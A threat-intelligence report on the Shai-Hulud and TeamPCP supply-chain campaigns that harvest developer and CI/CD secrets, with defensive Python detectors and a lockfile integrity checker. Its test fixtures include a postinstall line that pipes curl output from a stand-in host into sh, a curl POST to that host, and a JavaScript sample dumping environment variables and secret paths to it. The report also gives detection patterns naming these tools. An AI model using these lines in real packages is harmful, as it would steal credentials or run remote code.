Full Report
Supply chain attackers are not only trying to slip malicious code into trusted software. They are trying to steal the access that makes trusted software possible. Recently, three separate campaigns hit npm, PyPI, and Docker Hub in a 48-hour window, and all three targeted secrets from developer environments and CI/CD pipelines, including API keys, cloud credentials, SSH keys, and tokens. This is
Analysis Summary
# Tool/Technique: Shai-Hulud / TeamPCP (Supply Chain Credential Harvesting)
## Overview
This technique represents a shift in software supply chain attacks where the primary objective is no longer just injecting malicious code into downstream products, but harvesting highly privileged "secrets" from developer workstations and CI/CD pipelines. By targeting the developer environment, attackers gain the credentials (API keys, tokens, SSH keys) necessary to impersonate trusted users and gain persistent access to the entire software delivery lifecycle (SDLC).
## Technical Details
- **Type:** Malware family / Supply Chain Attack Campaign
- **Platform:** Cross-platform (Windows, macOS, Linux) via npm, PyPI, and Docker ecosystems.
- **Capabilities:** Credential theft, automated environment scanning, exfiltration of secrets, self-propagation via poisoned packages or dependency updates.
- **First Seen:** Early occurrences noted; "Shai-Hulud 2.0" and "mini Shai Hulud" campaigns active circa 2024-2026.
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1195.002 - Supply Chain Compromise: Compromise Software Dependencies]
- **[TA0006 - Credential Access]**
  - [T1552 - Unsecured Credentials]
  - [T1552.001 - Credentials In Files]
  - [T1552.004 - Private Keys]
- **[TA0007 - Discovery]**
  - [T1083 - File and Directory Discovery]
  - [T1082 - System Information Discovery]
- **[TA0010 - Exfiltration]**
  - [T1041 - Exfiltration Over C2 Channel]
## Functionality
### Core Capabilities
- **Automated Secret Scanning:** Recursively searches developer workstations for `.env` files, shell history, `.bash_history`, `.zsh_history`, and configuration files like `.npmrc` or `.aws/credentials`.
- **Infrastructure Context Mapping:** Identifies the "context" of a workstation by linking discovery data (e.g., matching a GitHub token found in a README to a specific private repository listed in a Git remote config).
- **Tool-Specific Harvesting:** Specifically targets credentials for developer tools including npm, PyPI, Docker Hub, and GitHub.
### Advanced Features
- **CI/CD Pipeline Pivot:** Uses harvested tokens to move from a developer workstation into automated build environments (GitHub Actions, GitLab CI/CD) to alter software during the build phase.
- **Agentic/Self-Propagating Loops:** Infecting a workstation allows the attacker to publish new malicious versions of internal packages, which are then automatically pulled by other developers or automated systems, creating a "mini Shai-Hulud" propagation effect.
## Indicators of Compromise
- **File Names:** `.env`, `npm-debug.log`, `config.json`, `.aws/credentials`, `id_rsa`.
- **Network Indicators:**
  - Exfiltration to unknown GitHub Gists or Pastebin-like services.
  - C2 traffic to domains masquerading as package registries (e.g., `registry.npmjs.org[.]io`).
- **Behavioral Indicators:**
  - Unexpected `curl` or `wget` commands originating from package install scripts (`preinstall`, `postinstall`).
  - Sudden, high-volume read access to hidden configuration files in user directories by a package manager process.
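The two behavioral indicators above can be expressed as detection logic over endpoint telemetry. The following is an added example written for this summary, not tooling from the report or from any vendor: it consumes process and file-access events in a hypothetical JSON-lines schema (fields `ts`, `pid`, `ppid`, `proc`, `cmdline`, `op`, `path`, an assumption rather than a real EDR format), walks each process's ancestry, and raises an alert when a `curl`/`wget` is spawned beneath a package-manager process or when such a process reads several hidden credential files in a burst. The sample events are constructed.

```python
"""Behavioural detection for credential harvesting during package installs.

Added example, not from the original report. Event schema and sample lines
are constructed; adapt the field names to your EDR's export format.
"""
import json
import re
from collections import defaultdict

# Processes that legitimately run during installs but should not be touching secrets.
PACKAGE_MANAGERS = {"npm", "node", "pip", "python", "python3", "docker", "yarn", "pnpm"}
DOWNLOADERS = {"curl", "wget"}

# Hidden config files under a home directory that a build step has no reason to read.
SENSITIVE_PATH_RE = re.compile(
    r"^/(home|Users)/[^/]+/("
    r"\.env|\.npmrc|\.bash_history|\.zsh_history|"
    r"\.aws/credentials|\.ssh/id_[a-z0-9]+|\.docker/config\.json)$"
)
# Distinct sensitive files one process may read before we call it a burst (assumed threshold).
BURST_THRESHOLD = 3

# Constructed telemetry: an `npm install` whose postinstall reads secrets and calls out,
# followed by an unrelated, benign editor opening .env.
SAMPLE_EVENTS = """\
{"ts":1,"pid":100,"ppid":1,"proc":"npm","cmdline":"npm install","op":"exec","path":""}
{"ts":2,"pid":101,"ppid":100,"proc":"sh","cmdline":"sh -c node postinstall.js","op":"exec","path":""}
{"ts":3,"pid":102,"ppid":101,"proc":"node","cmdline":"node postinstall.js","op":"exec","path":""}
{"ts":4,"pid":102,"ppid":101,"proc":"node","cmdline":"node postinstall.js","op":"read","path":"/home/dev/.npmrc"}
{"ts":5,"pid":102,"ppid":101,"proc":"node","cmdline":"node postinstall.js","op":"read","path":"/home/dev/.aws/credentials"}
{"ts":6,"pid":102,"ppid":101,"proc":"node","cmdline":"node postinstall.js","op":"read","path":"/home/dev/.ssh/id_ed25519"}
{"ts":7,"pid":102,"ppid":101,"proc":"node","cmdline":"node postinstall.js","op":"read","path":"/home/dev/.bash_history"}
{"ts":8,"pid":103,"ppid":102,"proc":"curl","cmdline":"curl -s -X POST https://example.invalid/collect","op":"exec","path":""}
{"ts":9,"pid":200,"ppid":1,"proc":"vim","cmdline":"vim .env","op":"read","path":"/home/dev/.env"}
"""


def ancestor_in(pid, names, procs, max_depth=16):
    """Return the first process name in `names` found walking from `pid` up its parent chain.

    `procs` maps pid -> (ppid, proc name) as learnt from events seen so far.
    """
    cur = pid
    for _ in range(max_depth):
        if cur not in procs:
            return None
        ppid, name = procs[cur]
        if name in names:
            return name
        cur = ppid
    return None


def analyze(lines):
    """Stream the events and return alerts as (kind, pid, package_manager, detail) tuples."""
    procs = {}                  # pid -> (ppid, proc) for ancestry lookups
    reads = defaultdict(set)    # pid -> sensitive paths it has read
    alerts = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        procs[ev["pid"]] = (ev["ppid"], ev["proc"])

        if ev["op"] == "exec" and ev["proc"] in DOWNLOADERS:
            # Indicator 1: curl/wget launched from under an install process.
            anc = ancestor_in(ev["pid"], PACKAGE_MANAGERS, procs)
            if anc:
                alerts.append(("downloader_from_package_manager", ev["pid"], anc, ev["cmdline"]))

        elif ev["op"] == "read" and SENSITIVE_PATH_RE.match(ev["path"]):
            # Indicator 2: a package-manager lineage reading several hidden credential files.
            anc = ancestor_in(ev["pid"], PACKAGE_MANAGERS, procs)
            if anc:
                reads[ev["pid"]].add(ev["path"])
                if len(reads[ev["pid"]]) == BURST_THRESHOLD:
                    alerts.append(("sensitive_file_burst", ev["pid"], anc, sorted(reads[ev["pid"]])))
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The ancestry walk is what keeps the benign `vim .env` read from alerting: the check is not "who reads secrets" but "does a package-manager process sit anywhere above the reader". Tune `BURST_THRESHOLD` and the path list to your fleet; tools that legitimately read `.npmrc` (the package manager itself, for registry auth) will need an allow-list on the exact path.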
## Associated Threat Actors
- **TeamPCP:** Known for using compromised packages and developer tooling to harvest environment variables.
- **Shai-Hulud Campaigns:** Associated with large-scale credential collection across GitHub and cloud services via poisoned dependencies.
## Detection Methods
- **Signature-based detection:** Scanning package manifests (`package.json`, `setup.py`) for suspicious install scripts.
- **Behavioral detection:** Monitoring for developer tools (node, python, docker) attempting to access sensitive files outside of their expected scope (e.g., reading SSH keys or shell histories).
- **YARA rules:** Focused on identifying common exfiltration patterns in scripts, such as regex strings looking for `AIza...` (Google API keys) or `ghp_...` (GitHub Personal Access Tokens).
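As an added example of the signature-based and YARA-style checks above (written for this summary, not the report's own tooling or any published rule set), the following script does two things: it flags npm lifecycle hooks in `package.json` that invoke downloaders or inline interpreters, and it scans JavaScript source for the markers a harvester tends to carry together, token-format regexes such as `AIza`/`ghp_` alongside an outbound request. The `AKIA` AWS key prefix is an addition not named in the report; the manifest and the source fixture are constructed and do nothing useful on their own.

```python
"""Static checks for credential-harvesting install scripts.

Added example, not from the original report. The manifest and JavaScript
below are constructed fixtures containing only the markers a scanner keys on.
"""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "preuninstall", "postuninstall")

# Commands that have no business in a library's install hook.
SUSPICIOUS_HOOK_RE = re.compile(
    r"\b(curl|wget)\b|\|\s*(sh|bash)\b|\bnode\s+-e\b|base64\s+(-d|--decode)|powershell.*-enc",
    re.I,
)

# Source-level markers: secret-format regexes, env dumps and secret paths
# become suspicious when they co-occur with an outbound request.
HARVESTER_MARKERS = {
    "google_api_key_regex": re.compile(r"AIza"),       # from the report
    "github_pat_regex": re.compile(r"ghp_"),           # from the report
    "aws_access_key_regex": re.compile(r"AKIA"),       # assumed addition
    "env_dump": re.compile(r"JSON\.stringify\(\s*process\.env\s*\)"),
    "home_secret_paths": re.compile(r"\.npmrc|\.aws/credentials|\.ssh|\.bash_history|\.zsh_history"),
    "outbound_post": re.compile(r"https?\.request\(|fetch\(|method:\s*['\"]POST['\"]", re.I),
}

# Constructed manifest: a postinstall that pipes a download into a shell.
SAMPLE_MANIFEST = json.dumps({
    "name": "left-pad-utils-constructed",
    "version": "1.0.3",
    "scripts": {
        "test": "jest",
        "postinstall": "node setup.js && curl -s https://example.invalid/x | sh",
    },
})

# Constructed fixture: carries the markers only; it reads nothing and sends nothing real.
SAMPLE_SETUP_JS = r"""
const os = require('os'), https = require('https');
const pats = [/AIza[0-9A-Za-z\-_]{35}/g, /ghp_[A-Za-z0-9]{36}/g, /AKIA[0-9A-Z]{16}/g];
const files = ['.npmrc', '.aws/credentials', '.bash_history'];
const loot = { env: JSON.stringify(process.env) };
https.request({ method: 'POST', host: 'example.invalid', path: '/c' }).end();
"""


def scan_manifest(manifest_json):
    """Return (hook, matched_text) for every lifecycle hook that trips the signature."""
    scripts = json.loads(manifest_json).get("scripts", {})
    hits = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            m = SUSPICIOUS_HOOK_RE.search(cmd)
            if m:
                hits.append((hook, m.group(0)))
    return hits


def scan_source(source, min_markers=3):
    """Return (markers_found, suspicious).

    A file is suspicious when at least one token-format regex co-occurs with an
    outbound request and the total marker count reaches `min_markers`.
    """
    found = sorted(name for name, rx in HARVESTER_MARKERS.items() if rx.search(source))
    has_token_regex = any(n.endswith("_regex") for n in found)
    suspicious = has_token_regex and "outbound_post" in found and len(found) >= min_markers
    return found, suspicious


if __name__ == "__main__":
    print("manifest hits:", scan_manifest(SAMPLE_MANIFEST))
    print("source scan:", scan_source(SAMPLE_SETUP_JS))
```

Requiring co-occurrence rather than any single marker is what keeps ordinary code quiet: a legitimate module that reads `process.env.GITHUB_TOKEN` and calls `fetch()` trips only one marker and is not reported. Run `scan_manifest` over every `package.json` in `node_modules` after install, or better, in CI before the install step executes hooks.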
## Mitigation Strategies
- **Secrets Management:** Use tools like Vault or 1Password for SSH keys and API tokens rather than storing them in plain-text `.env` files or system environment variables.
- **Least Privilege:** Implement fine-grained access tokens (e.g., GitHub Fine-grained PATs) with minimal permissions and short expiration windows.
- **Dependency Pinning:** Use lockfiles (`package-lock.json`, `poetry.lock`) and perform integrity checks to ensure dependencies haven't been tampered with.
- **Workstation Hardening:** Treat developer machines as high-trust assets with strict EDR monitoring for file-system access to sensitive directories.
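The dependency-pinning point above is only effective if the lockfile's pins are actually checked against what is fetched. The following is an added example for this summary, not the report's or npm's own code: it reads the `packages` map of an npm lockfile (lockfileVersion 2/3), confirms each `resolved` URL points at a trusted registry host (so a lookalike such as the defanged `registry.npmjs.org[.]io` indicator is rejected), and compares the downloaded tarball's SHA-512 against the `integrity` field in Subresource Integrity form (`sha512-` + base64). The lockfile and tarball bytes are constructed, and the hashes are computed from those bytes rather than copied from a registry; the trusted-host set is an assumption to adjust for private registries.

```python
"""Verify npm lockfile pins (resolved host + SRI integrity) against fetched tarballs.

Added example, not from the original report. Lockfile, tarball bytes and the
trusted-host set are constructed assumptions.
"""
import base64
import hashlib
import json
from urllib.parse import urlparse

# Assumed policy: only the public registry is acceptable as a download source.
TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}


def sri_sha512(data: bytes) -> str:
    """Subresource Integrity string as npm writes it into `integrity`."""
    return "sha512-" + base64.b64encode(hashlib.sha512(data).digest()).decode()


# Constructed tarball contents; in practice these are the .tgz bytes fetched from `resolved`.
GOOD_TARBALL = b"constructed-tarball-bytes-for-example-pkg-1.2.3"
TAMPERED_TARBALL = GOOD_TARBALL + b"\n// injected postinstall"

SAMPLE_LOCKFILE = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"example-pkg": "1.2.3", "other-pkg": "0.1.0"}},
        "node_modules/example-pkg": {
            "version": "1.2.3",
            "resolved": "https://registry.npmjs.org/example-pkg/-/example-pkg-1.2.3.tgz",
            "integrity": sri_sha512(GOOD_TARBALL),
        },
        "node_modules/other-pkg": {
            "version": "0.1.0",
            # Registry-lookalike host, modelled on the defanged indicator in the report.
            "resolved": "https://registry.npmjs.org.io/other-pkg/-/other-pkg-0.1.0.tgz",
            "integrity": sri_sha512(b"constructed-other-pkg-bytes"),
        },
    },
})


def check_package(lock_entry: dict, tarball: bytes) -> list:
    """Return the problems found for one lockfile entry against the bytes actually fetched."""
    problems = []
    host = urlparse(lock_entry.get("resolved", "")).hostname or ""
    if host not in TRUSTED_REGISTRY_HOSTS:
        problems.append(f"untrusted resolved host: {host!r}")
    integrity = lock_entry.get("integrity", "")
    if not integrity.startswith("sha512-"):
        problems.append("missing or weak integrity pin (expected sha512)")
    elif integrity != sri_sha512(tarball):
        problems.append("integrity mismatch: tarball differs from lockfile pin")
    return problems


def audit_lockfile(lockfile_json: str, fetched: dict) -> dict:
    """Map each package path to its problems; `fetched` maps path -> tarball bytes."""
    packages = json.loads(lockfile_json)["packages"]
    report = {}
    for path, entry in packages.items():
        if path == "":          # the root project has no tarball of its own
            continue
        report[path] = check_package(entry, fetched.get(path, b""))
    return report


if __name__ == "__main__":
    fetched = {"node_modules/example-pkg": GOOD_TARBALL, "node_modules/other-pkg": b""}
    for path, problems in audit_lockfile(SAMPLE_LOCKFILE, fetched).items():
        print(path, "OK" if not problems else problems)
```

The host check matters as much as the hash: an attacker who can rewrite the lockfile in a pull request can also write a matching `integrity` value for their own tarball, so review lockfile diffs for `resolved` changes and treat any host outside the allow-list as a blocking finding. A package whose tarball was never fetched (empty bytes above) fails the integrity comparison rather than passing silently.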
## Related Tools/Techniques
- **Dependency Confusion:** A technique often used to deliver these credential-harvesting payloads.
- **Typosquatting:** Registering domains or package names similar to popular tools to deceive developers into installing malicious code.
- **Token Leakage via Logs:** Exploiting CI/CD logs that inadvertently print secrets during build failures.